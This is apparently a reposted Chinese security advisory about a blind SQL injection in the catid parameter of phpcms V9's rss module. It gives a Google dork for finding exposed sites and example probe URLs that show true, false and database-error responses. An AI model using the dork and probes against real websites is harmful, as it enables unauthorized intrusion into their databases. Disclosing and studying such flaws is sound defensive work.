phpcms V9 BLind SQL 注入漏洞0day

时间:2021-05-24

  影响版本:phpcms v9 blind

  官方网站:http://

  漏洞类型:SQL注入

  漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。

  google dork:inurl:"index.php?m=content+c=rss+catid=10"

  exploit & p0c

  [!] index.php?m=content&c=rss&catid=[valid catid]

  Example p0c

  [!] http://host/index.php?m=content&c=rss&catid=10 <= True

  [!] http://host/index.php?m=content&c=rss&catid=-10 <= False

  [+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。

相关文章